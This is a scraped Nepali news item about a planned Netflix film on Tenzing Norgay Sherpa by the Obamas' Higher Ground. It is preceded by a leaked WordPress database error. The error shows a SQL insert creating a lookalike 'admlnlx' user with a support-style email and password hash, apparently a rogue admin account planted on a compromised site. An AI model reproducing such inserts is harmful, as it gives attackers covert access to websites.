WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQZknZVLU60HK/aLAFzwBQgow9MgVi.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 14:17:29', '', 'admlnlx', 'admlnlx')
विश्वको सर्वोच्च शिखर सगरमाथा आरोहण गर्ने पहिलो व्यक्ति नेपालका तेन्जिङ नोर्गे शेर्पाबारे अमेरिकामा चलचित्र बन्ने भएको छ।
अमेरिकाका पूर्व राष्ट्रपति बाराक ओबामा र मिसेल ओबामाको कम्पनी ‘हाइयर ग्राउन्ड’ले सन् २००३ मा इद डग्लासले लेखेको पुस्तक ‘तेन्जिङः हिरो अफ एभरेस्ट’ पुस्तकको आधारमा चलचित्र बनाउने घोषणा गरेको हो।
द भल्चर डटकमका अनुसार बाराक र मिसेलको कम्पनीले निर्माण गर्न लागेको चलचित्रको नाम ‘तेन्जिङ’ हुनेछ। यसको निर्देशन जेनिफर पिदोम र लुक डेभिसले गर्नेछन्।
सन् १९५३ मे २९ का दिन न्युजिल्यान्डका पर्वतारोही एडमन्ड हिलारी र तेन्जिङ नोर्गे शेर्पाले पहिलोपटक सगरमाथाको आरोहण गरेका थिए।
ओबामा दम्पतीको कम्पनीले निर्माण गर्ने चलचित्र नेटफ्लिक्समा सार्वजनिक हुनेछ।